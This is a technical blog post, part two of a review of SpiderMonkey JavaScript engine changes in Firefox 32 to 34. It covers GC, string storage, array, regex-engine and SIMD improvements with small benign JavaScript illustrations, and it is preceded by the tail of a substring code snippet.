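  const b = end === undefined ? length : clampIndex(end, length);
  // substring swaps its arguments when start is larger than end
  const from = Math.min(a, b);
  const to = Math.max(a, b);
  let result = '';
  for (let i = from; i < to; i++) result += str[i];
  return result;
}
```

Because the clamping is ordinary JavaScript, a JIT that can prove `start` and `end` are already in range at a call site has the opportunity to drop those checks, which is not possible when they are hidden behind a native call.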

Read more about this in the bug report

Year in review: Spidermonkey in 2014 part 2

In the first part of this series I noted that the major changes in Spidermonkey in 2014 were about ECMAScript 6 compliance, JavaScript performance and GC improvements. I also enumerated the major Spidermonkey changes that happened from Firefox 29 until Firefox 31. If you haven’t read the first part yet, I would encourage you to do that first. In part two I will continue going over the major changes from Firefox 32 until Firefox 34.

<- Year in review: Spidermonkey in 2014 part 1

Firefox 32

Recover instructions

During the Firefox 32 release, recover instructions were introduced. This adds the possibility to do more aggressive optimizations in IonMonkey. Before, we couldn’t eliminate some instructions since the result was needed if we had to switch back to a lower compiler tier (a bailout from IonMonkey to Baseline). This new infrastructure makes it possible to recover the needed result by adding instructions to this bailout path. As a result, we still have the needed results when bailing out, but don’t have to keep a normally unused instruction in the code stream.

Read more about this change
Read more about this in the bug report

Irregexp


Internally there has been a lot of discussion about the regular expression engine used in Spidermonkey. We used to use yarr, the regular expression engine of WebKit, but there were some issues: we sometimes got wrong results, there were security issues and yarr hadn’t been updated in a while. As a result we switched to irregexp, the regular expression engine in V8 (the JS engine in Chrome). In the long run this helps by giving us a more up-to-date engine, which has JIT-to-JIT support and is more actively tested for security issues.

Read more about this in the bug report

Keep Ion code during GC

Another achievement that landed in Firefox 32 was the ability to keep IonMonkey JIT code during GC. This required Type Inference changes. Type information (TI) was always cleared during GC and, since IonMonkey code depends on it, the code became invalid and we had to throw the Ion code away. For a few releases now we have been able to release type information in chunks, and since Firefox 32 we keep IonMonkey code that is active on the stack. This results in fewer dips in performance during GC, since we don’t lose the Ion code.

Read more about this in the bug report

Generational GC

Generational GC was announced as far back as 2011, but it took a lot of work to finally get there. In Firefox 29 exact rooting landed, which was a prerequisite. Now we finally use a more advanced GC algorithm to collect memory, and this also paves the way for even more advanced GC algorithms. This narrowed the performance gap we had on the Octane benchmark compared to V8, which already had Generational GC.

Read more about this change

Firefox 33

8 bit strings

Since the first Spidermonkey release, strings have always been stored as a sequence of UTF-16 code units, so every string takes 16 bits per character. This is quite wasteful, since most strings don’t need the extended format and their characters fit nicely into 8 bits (Latin1 strings). From this release on strings are stored in this smaller format when possible. The main idea was to decrease memory usage, but there were also some performance increases for string intensive tasks, since they now only need to operate over half as much data.
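
The condition for the smaller format can be sketched in a few lines. The helper names `fitsInLatin1` and `approxCharBytes` are made up for this example, and the byte count only covers the character data, not any header the engine keeps per string.

```javascript
// Returns true when every UTF-16 code unit of `str` fits in 8 bits (Latin1).
function fitsInLatin1(str) {
  for (let i = 0; i < str.length; i++) {
    if (str.charCodeAt(i) > 0xff) {
      return false;
    }
  }
  return true;
}

// Rough size of the character data alone: 1 byte per code unit for
// Latin1 strings, 2 bytes per code unit otherwise.
function approxCharBytes(str) {
  return str.length * (fitsInLatin1(str) ? 1 : 2);
}
```

A string like "hello" or "café" passes the check and needs half the space, while a string containing characters outside Latin1 keeps the 16-bit representation.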

Read more about this change

Firefox 34

ES6 template strings

ES6 will introduce something called template strings. These template strings are surrounded by backticks ( ` ) and, among other things, allow you to create multi-line strings, which weren’t possible before. Template strings also make it possible to embed expressions into strings without using concatenation. Support for this feature has been introduced in Firefox 34.
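
A short example shows both features side by side. The variable names are only there for illustration.

```javascript
const engine = "Spidermonkey";
const version = 34;

// Before: concatenation and an explicit "\n" for the line break.
const oldStyle = "Engine: " + engine + "\n" + "Firefox " + version;

// Template string: embedded expressions and a literal line break.
const newStyle = `Engine: ${engine}
Firefox ${version}`;
```

Both variables end up holding the same two-line string.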

Read more about ES6 template strings.

Copy on write

A new optimization for arrays has been added. Before, when you copied an array, the JavaScript engine had to copy every single item from the original array to the new array, which can be an expensive operation for big arrays. In this release this pain has been decreased with the introduction of “Copy on write” arrays. In that case we only copy the content of an array when we start modifying the new array. That way we don’t need to allocate and copy the contents for arrays that get copied but not modified.
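
The engine does this internally and invisibly, but the principle can be modelled with a toy wrapper in JavaScript. The `CowArray` class below is a made-up sketch under that assumption and says nothing about how Spidermonkey actually lays out its arrays.

```javascript
// Toy copy-on-write wrapper, for illustration only.
class CowArray {
  constructor(items, shared = false) {
    this.items = items;   // backing storage, possibly shared
    this.shared = shared; // true while another CowArray may use `items`
  }

  // "Copying" only shares the backing storage: no allocation, no element copy.
  copy() {
    this.shared = true;
    return new CowArray(this.items, true);
  }

  get(index) {
    return this.items[index];
  }

  // The first write to shared storage pays for the real copy.
  set(index, value) {
    if (this.shared) {
      this.items = this.items.slice();
      this.shared = false;
    }
    this.items[index] = value;
  }
}

const original = new CowArray([1, 2, 3]);
const copy = original.copy();
const sharedBeforeWrite = copy.items === original.items; // storage is shared
copy.set(0, 99); // the real copy happens here
```

After the write the two wrappers no longer share storage, and the original still holds its old contents. A copy that is never written to never pays for the allocation.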

Read more about this in the bug report.

Inline global variable

A second optimization was about inlining constant global names and constant name accesses from singleton scope objects. This optimization helps performance for people who have constant variables defined in the global scope. Instead of reading the constant out of memory every time, the constant gets embedded into the code, just as if you had written the constant there yourself. So now it is possible to have a “var DEBUG = false” and everywhere you test for DEBUG it will get replaced with ‘false’ and that branch will be removed.
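
In source code terms the effect looks roughly like this. The functions `area` and `areaAsIfInlined` are made up for the example, and the second one is only a picture of what the optimized code behaves like, not something the engine literally generates as JavaScript.

```javascript
var DEBUG = false;

// What you write: a check against a global that never changes.
function area(width, height) {
  if (DEBUG) {
    console.log("area called with", width, height);
  }
  return width * height;
}

// What the optimized code effectively behaves like once DEBUG has been
// replaced with `false` and the dead branch has been removed.
function areaAsIfInlined(width, height) {
  return width * height;
}
```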

Read more about this in the bug report

SIMD in asm.js

SIMD or Single Instruction Multiple Data makes it possible to execute the same operation on multiple inputs at the same time. Modern CPUs already support this using 128-bit vectors, but currently we don’t really have access to these speedups in JavaScript. SIMD.js is a proposal to expose this to JavaScript. In Firefox 34 experimental support (only available in Firefox Nightly builds) for these instructions in asm.js code was added. This makes it possible to create code that can run up to 4x faster (Amdahl’s law) using SIMD. Now work is underway to fully optimize SIMD.js in all Ion-compiled JS. When this work is complete, and assuming continued progress in the standards committee, SIMD.js will be released to all Firefox users in a future version.
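
The “up to 4x” figure and the reference to Amdahl’s law can be made concrete with a small calculation. The function name `amdahlSpeedup` is made up for this example, and the factor 4 assumes four 32-bit lanes in a 128-bit vector.

```javascript
// Amdahl's law: overall speedup when a fraction `p` of the run time
// is accelerated by a factor `n`, and the rest stays as it was.
function amdahlSpeedup(p, n) {
  return 1 / ((1 - p) + p / n);
}

// Everything vectorized: the full factor of 4.
const allVectorized = amdahlSpeedup(1, 4);

// Only half of the run time vectorized: a much smaller gain.
const halfVectorized = amdahlSpeedup(0.5, 4);
```

The 4x is an upper bound that is only reached when all of the run time is spent in code that benefits from SIMD. With half of the time vectorized the overall speedup drops to 1.6x.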

Read more about this change
Read more about this in the bug report
View the SIMD.js demos

Update: The next post in this series has been published:
Read part 3 of ‘Year in review: spidermonkey in 2014’ ->